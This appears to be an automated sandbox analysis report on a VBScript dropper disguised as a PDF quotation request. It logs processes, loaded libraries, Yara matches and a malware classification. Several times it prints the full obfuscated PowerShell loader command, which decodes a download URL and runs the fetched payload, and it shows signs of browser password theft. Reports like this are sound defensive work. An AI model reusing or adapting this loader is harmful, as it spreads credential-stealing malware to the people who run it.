WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D6B2F2	2_2_00007FF848D6B2F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D6C0A2	2_2_00007FF848D6C0A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E3A09A	2_2_00007FF848E3A09A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310F320	4_2_0310F320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310FBF0	4_2_0310FBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310EFD8	4_2_0310EFD8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6999
Source: unknown	Process created: Commandline size = 6999
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6999	Jump to behavior

Yara signature match

Source: amsi32_1292.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@34/10@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Smaalige.Eks

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tgk4xkj.rz5.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1292
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dxdiag.exe, 00000014.00000003.2503662795.0000000021915000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
